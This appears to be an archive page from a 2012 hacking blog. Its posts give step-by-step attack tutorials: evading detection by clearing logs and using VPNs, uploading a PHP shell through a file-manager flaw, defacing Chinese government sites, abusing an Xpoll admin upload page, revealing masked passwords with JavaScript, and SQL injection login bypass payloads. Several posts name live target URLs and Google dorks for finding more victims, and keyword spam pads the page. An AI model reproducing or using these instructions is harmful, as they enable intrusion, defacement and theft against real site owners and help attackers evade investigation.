Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts

Friday, 17 February 2012

How To Secure Your Hacking? To Never Get Caught [TUT]

Tutorial contains:

How hackers get caught.
Hiding you and securing as "Hacker".
Destroying your system logs.
Setting up VPN - Making you anonymous.


Okay, let's begin!

1) How hackers get caught.

- First stuff that gives you away are "LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binarys.

- Your laziness will take you into problems.
NEVER HACK FROM HOME! Take your time, and go to net cafe or anywhere else apart from home. Logs will take you down!

- The code that you run on system will take you down. If you compile the code on target, libraries will give you away!

- If your victm, notice, that he is maybe hacked, or something is wrong.. He will ask from his ISP for IP logs, and if you dont use VPN, or if you hack from home, they will hunt you down.

- Thing, that takes you down 100% is BRAGGING. It is common problem of beginning hackers. They like to brag, to earn respect and reputation but NOT KNOWING that is the matter of minutes, hours mby days when they will be caught.
*Don't use hotmail. CIA Owns it.

2) Hiding and Securing you as "Hacker"

- Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.

*A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.
*An older hacker, on the other hand, will rarely leave any tracks. They know how to use their slave's computers as a tool for a launching place to get into another computer.

There will always be hackers, and there will always be hackers in prison.

* DESTROY LOGS, REMOVE ALL YOUR TRACKS!

* DO NOT HACK AT HOME! USE VPN THAT SAVES NO LOGS!

HOW TO REMOVE YOUR SYSTEM LOGS:

Choose Start > Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select Clear All Events.
To save the current system log, click Yes when Windows returns the message, "Do you want to save 'System' before clearing it?", enter a file name for the saved system log file, and then click Save.

Virtual Private Network - VPN(Click on spoilers)
1)
Spoiler (Click to Hide)
I will recommend you to use proXPN.
It is VPN that do not store logs.
proXPN: http://proxpn.com/download.php

ProXPN Windows installation:

(I used images from proXPN official website)


Click "Next"

Just click "Agree" here to continue installation.

Let the installer run until completion.

Just click the "Finish" button to complete the installation.

Welcome to the proXPN client. Click the "Don't have an account?" link to create a new account.

Enter your email address and the password of your choice. Then check the license agreement checkbox and click the "I agree - create account" button.

Click "OK" to finish the account signup process in the software client.

Check your email for a greeting email from proXPN. In that email is a link which you will need to click in order to activate your free account. If it doesn't show up within a reasonable timeframe, make sure to check your spam folders. Once you've clicked the link in the email, your account should be active. Go ahead and click the "connect" button to connect to proXPN


Once you connect, the system tray icon will turn green. You're now surfing safe and secure, courtesy of proXPN.

And you are done with securing yourself.
Just to make sure, go check if you are truly anonimous ;)
http://www.ip-adress.com/Proxy_Checker/

Credit: Lazlow from HF


Keywords:learn to hack, facebook hacking software download, gmail hacking, twitter hacking , cmd hacks, tips and Securities, youtube downloader, download youtube download,angry birds free download,how to remove this copy windows not genuine, AHSEC previous year question paper for hs 2nd year, AHSEC 2012 question papers for hs 2nd year and final year, Windows Softwares free download AHSEC sample papers for hs final year, free download youtube downloader, youtube downloader free download, learn free hacking, learn hacking free, customize windows, customize windows 7, customize win 7, free hacking softwares, free hacking softwares download, hacking software free download how to hack, learn hacking, learn how to hack, hacking tips, english songs free download, free english songs download, hollywood songs download, become a hacker,Anti Hacking , Hacking , Learn Hacking , Learn Protection from Hackers, warez , Http Proxy , L1/L2/L3 HTTP Proxies , Fresh HTTP High Anonymous / Anonymous / Transparent Proxies ,4/5 socks proxies , keygens , cracks , cracked softwares , cracked programs , keyloggers , bots , RAT , rootkits , shell scripts , free premium accounts , yahoo boters , yahoo programs , yahoo tutorials , yahoo id maker , yahoo room tools , nimbuzz hacking , flooders , programming , pc protection tutorials , security alets , security tutorials , Exploits , Exploit , hacking,hackware,hackers,hack,cracker,crack,patch,serial,software,forum,vulnerability,application,lounge,white hat,graphics,programming,computer,protection,security,alerts,Networking,server,exploits,myspace,warez,downloads,keygen,keylogger,coding,facebook,orkut,flooders elite team,botnets,exploits, reviews, malicious,reverse engineering, analysis, DDOS, Shell, Protect, taskhost, CMD, Net, Bytes, Kilobytes, Megabytes, Gigabytes, Terrabytes, free support, United Kingdom, United States, Alexa, Google, Yahoo, Baidu, Competition, Tabbed head in MYBB,Tab Head plugin, SEO,cpanel, control panel, Proxy, VPN, Webhosting, Webmaster download free hacking tools, free hacking program, hacking software, largest underground hacker convention, hacking security conference, hacking forum, pen-testing, penetration testing, hacker gathering,skywalk3r, lockpicking, hacker community, goons, computer exploits, zero day vulnerabilities, 0day, robotics, hacker attack, defend against hackers hacking, icq, cryptography, hotmail, trojans, cracks, bo2k,aol, firewall, warez, proxy, trojan, subseven, linux, back orifice, serials, flooding, web board, appz, yahoo, passwords, nuke, credit card, irc, netsphere, wingate, gsm,proxies, password, telnet, exploits, bomber, phreaking, spoof,nuker, crack, nukes, serial, virii, cracking, unscambler,jammer, adult check, crackers, crackz, hack, ip, sniffing, wingates, surf,exploit, nukers, anonymous, hackz, antivirus, net bus, satan,smurf attacks, teardrop, security, keyloggers, port scanner,warfare, spoofers, internet, anonymity, cryptology, pgp, mark zuckerburg, Facebook, facebook hack, facebook hacking software, facebook hacking techniques, website hacking, hack website, website hacking software, website deafcing, web deface, web defacing, email hacking, hack email id, hack email, hack ones email, email hacking software, email bomber, hacking, hackingsart, virus!!
Read More

Thursday, 16 February 2012

SimogeoFilemanager Upload File Vulnerability ...( Upload Your Shell )



Hey frenzz,
Today i ws lookin 4 a new vulnerablility n find out this vulnerability. original advisory for this post is 1337day.
Auther of this Exploit  is RoxSecurityTeam.

  




I brought this post for EDUCATIONAL purpose not for misuse or illegal ways of Hacking...


WARNING: I am not reponsible of any harm with this methods. ....Do it at your own risk.



Google Dorks: 


inurl:/filemanager/userfiles/ 
filetype:pdf 
inurl:/filemanager/index.html


Steps:


1.Search site that contains the vulnnerable file /filemanager/index.html
2.Upload Backdoor Shell.php
3.Move to the folder where files are stored /UserFiles/ Exemple: http://site.com/filemanager/UserFiles/Shell.php
4.you can have full access to your shell


Demonstration :
http://www.comune.gattinara.vc.it/newSys/ckeditor/filemanager/index.html
ftp://193.9.21.135/riba.si/wwwroot/cms/controls/ckeditor/filemanager/index.html


njoy ;)


Thanks To Techno Paradise


Keywords: learn to hack, facebook hacking software download, gmail hacking, twitter hacking , cmd hacks, tips and Securities, youtube downloader, download youtube download,angry birds free download,how to remove this copy windows not genuine, AHSEC previous year question paper for hs 2nd year, AHSEC 2012 question papers for hs 2nd year and final year, Windows Softwares free download AHSEC sample papers for hs final year, free download youtube downloader, youtube downloader free download, learn free hacking, learn hacking free, customize windows, customize windows 7, customize win 7, free hacking softwares, free hacking softwares download, hacking software free download how to hack, learn hacking, learn how to hack, hacking tips, english songs free download, free english songs download, hollywood songs download, become a hacker,Anti Hacking , Hacking , Learn Hacking , Learn Protection from Hackers, warez , Http Proxy , L1/L2/L3 HTTP Proxies , Fresh HTTP High Anonymous / Anonymous / Transparent Proxies ,4/5 socks proxies , keygens , cracks , cracked softwares , cracked programs , keyloggers , bots , RAT , rootkits , shell scripts , free premium accounts , yahoo boters , yahoo programs , yahoo tutorials , yahoo id maker , yahoo room tools , nimbuzz hacking , flooders , programming , pc protection tutorials , security alets , security tutorials , Exploits , Exploit , hacking,hackware,hackers,hack,cracker,crack,patch,serial,software,forum,vulnerability,application,lounge,white hat,graphics,programming,computer,protection,security,alerts,Networking,server,exploits,myspace,warez,downloads,keygen,keylogger,coding,facebook,orkut,flooders elite team,botnets,exploits, reviews, malicious,reverse engineering, analysis, DDOS, Shell, Protect, taskhost, CMD, Net, Bytes, Kilobytes, Megabytes, Gigabytes, Terrabytes, free support, United Kingdom, United States, Alexa, Google, Yahoo, Baidu, Competition, Tabbed head in MYBB,Tab Head plugin, SEO,cpanel, control panel, Proxy, VPN, Webhosting, Webmaster download free hacking tools, free hacking program, hacking software, largest underground hacker convention, hacking security conference, hacking forum, pen-testing, penetration testing, hacker gathering,skywalk3r, lockpicking, hacker community, goons, computer exploits, zero day vulnerabilities, 0day, robotics, hacker attack, defend against hackers hacking, icq, cryptography, hotmail, trojans, cracks, bo2k,aol, firewall, warez, proxy, trojan, subseven, linux, back orifice, serials, flooding, web board, appz, yahoo, passwords, nuke, credit card, irc, netsphere, wingate, gsm,proxies, password, telnet, exploits, bomber, phreaking, spoof,nuker, crack, nukes, serial, virii, cracking, unscambler,jammer, adult check, crackers, crackz, hack, ip, sniffing, wingates, surf,exploit, nukers, anonymous, hackz, antivirus, net bus, satan,smurf attacks, teardrop, security, keyloggers, port scanner,warfare, spoofers, internet, anonymity, cryptology, pgp, mark zuckerburg, Facebook, facebook hack, facebook hacking software, facebook hacking techniques, website hacking, hack website, website hacking software, website deafcing, web deface, web defacing, email hacking, hack email id, hack email, hack ones email, email hacking software, email bomber, hacking, hackingsart, virus!!
Read More

Monday, 13 February 2012

Write vulnerablity On China Government websites

I Got a new Write vulnerablity On China Government websites, This vulnerablity allow to hackers for writing in Files remotly.


You can Write your message in fileds Like " Hacked by XYZ"


 so Lets Start Goto A search portal (Google.cn or Yahoo and Baidu )and type this dorks one by one : 
"inurl:admin/gg1/list.asp"
"inurl:admin/gg1/"
after opening website from serch result go to : website.com/admin/gg1/list.asp 
and Transte page using Google Translator and Find edit option and edit that Page 
Then Paste your message there 

now click on save button and check website.com/admin/gg1/list.asp  again 
now you'll got your message here =) You sluold Make a Miror after editing because someone elase can cange your message [Best Mirror Provider Websites]
Live demo :
http://fpb.zhuxi.gov.cn/admin/gg1/list.asp  
http://www.tianzhushan.gov.cn/admin/gg1/list.asp  
http://www.jtzl.gov.cn/admin/gg1/list.asp  
http://www.dbs110.gov.cn/admin/gg1/list.asp  
http://www.rzrsld.gov.cn/admin/gg1/list.asp  
http://www.xiejia.gov.cn/admin/gg1/list.asp  
http://www.qjrenda.gov.cn/admin/gg1/list.asp  
http://www.investna.gov.cn/admin/gg1/list.asp  
http://www.bzhbj.gov.cn/admin/gg1/list.asp  
http://www.kfxrmzf.gov.cn/admin/gg1/list.asp  
http://www.westkj.gov.cn/admin/gg1/list.asp  
http://www.ytjtw.gov.cn/admin/gg1/list.asp  
http://www.jjmaqiao.gov.cn/admin/gg1/list.asp  
http://xnmw.xining.gov.cn/admin/gg1/list.asp  
http://www.dantulss.gov.cn/admin/gg1/list.asp  
http://www.bazhouhb.gov.cn/admin/gg1/list.asp

Enjoy Hacking & Stay Tuned More Tutorials To Come ;)


Read More

Hack Website Through Exploit of Xpoll Admin


Hack Website Through Exploit of Xpoll Admin

Frist of all open


Then type xpoll admin
in a seacrh bar

After hit you will be see many sites which are search by google
now open sites you will be get open admin image upload area where you can upload your
Deface page / shell / or you can load your image to

Once you upload your Deface page
than remove /admin from URL and after images/ type your deface page name like hitcher101.html in my case

Demo

Enjoy it

Thanks To HackingsArt
Read More

Reveal *****(Asterisk) Passwords Using Javascript

Reveal *****(Asterisk) Passwords Using Javascript




Want to Reveal the Passwords Hidden Behind Asterisk (****) ?



Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com) 

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

Thanks To HackingArt :)
Read More

Saturday, 11 February 2012

SQL Injection tutorial to Hack websites | Hacking websites


Hello Friends, as you all know in previous hacking classes we have already discussed aboutSQL Injections method of hacking websites. Some of my website users reported that those articles are little bit difficult to understand for new users who wish to learn hacking. For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article  at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting websites. This article is also beneficial for hackers too as it will refresh their concepts that what really we have to do and look into website URL if we want to hack website or its database using SQL injection. So Guys read on very basic SQL injection tutorial...
hacking websites, sql injection attack
SQL injection tutorial to hack websites | Hacking website databse


What is SQL Injection?
Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say LOKESH and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:
1. You need a web browser to open URL and viewing source codes.
2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.
3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..

What you should look into website to detect is it vulnerable to SQL injection attack or not?
First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source codeof the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

 < F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Everything between the < f o r m >  and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.


There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:
http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:
http://example.com/login.asp?id=hi' or 1=1--

 You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:

< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t  type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

 If your luck is favoring you, you will get the login into the website without any username or password.


But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
 
The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not. 
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote ('). 
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a
 
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

Keywords:learn to hack, facebook hacking software download, gmail hacking, twitter hacking , cmd hacks, tips and Securities, youtube downloader, download youtube download,angry birds free download,how to remove this copy windows not genuine, AHSEC previous year question paper for hs 2nd year, AHSEC 2012 question papers for hs 2nd year and final year, Windows Softwares free download AHSEC sample papers for hs final year, free download youtube downloader, youtube downloader free download, learn free hacking, learn hacking free, customize windows, customize windows 7, customize win 7, free hacking softwares, free hacking softwares download, hacking software free download how to hack, learn hacking, learn how to hack, hacking tips, english songs free download, free english songs download, hollywood songs download, become a hacker,Anti Hacking , Hacking , Learn Hacking , Learn Protection from Hackers, warez , Http Proxy , L1/L2/L3 HTTP Proxies , Fresh HTTP High Anonymous / Anonymous / Transparent Proxies ,4/5 socks proxies , keygens , cracks , cracked softwares , cracked programs , keyloggers , bots , RAT , rootkits , shell scripts , free premium accounts , yahoo boters , yahoo programs , yahoo tutorials , yahoo id maker , yahoo room tools , nimbuzz hacking , flooders , programming , pc protection tutorials , security alets , security tutorials , Exploits , Exploit , hacking,hackware,hackers,hack,cracker,crack,patch,serial,software,forum,vulnerability,application,lounge,white hat,graphics,programming,computer,protection,security,alerts,Networking,server,exploits,myspace,warez,downloads,keygen,keylogger,coding,facebook,orkut,flooders elite team,botnets,exploits, reviews, malicious,reverse engineering, analysis, DDOS, Shell, Protect, taskhost, CMD, Net, Bytes, Kilobytes, Megabytes, Gigabytes, Terrabytes, free support, United Kingdom, United States, Alexa, Google, Yahoo, Baidu, Competition, Tabbed head in MYBB,Tab Head plugin, SEO,cpanel, control panel, Proxy, VPN, Webhosting, Webmaster download free hacking tools, free hacking program, hacking software, largest underground hacker convention, hacking security conference, hacking forum, pen-testing, penetration testing, hacker gathering,skywalk3r, lockpicking, hacker community, goons, computer exploits, zero day vulnerabilities, 0day, robotics, hacker attack, defend against hackers hacking, icq, cryptography, hotmail, trojans, cracks, bo2k,aol, firewall, warez, proxy, trojan, subseven, linux, back orifice, serials, flooding, web board, appz, yahoo, passwords, nuke, credit card, irc, netsphere, wingate, gsm,proxies, password, telnet, exploits, bomber, phreaking, spoof,nuker, crack, nukes, serial, virii, cracking, unscambler,jammer, adult check, crackers, crackz, hack, ip, sniffing, wingates, surf,exploit, nukers, anonymous, hackz, antivirus, net bus, satan,smurf attacks, teardrop, security, keyloggers, port scanner,warfare, spoofers, internet, anonymity, cryptology, pgp, mark zuckerburg, Facebook, facebook hack, facebook hacking software, facebook hacking techniques, website hacking, hack website, website hacking software, website deafcing, web deface, web defacing, email hacking, hack email id, hack email, hack ones email, email hacking software, email bomber, hacking, hackingsart, virus!!
Read More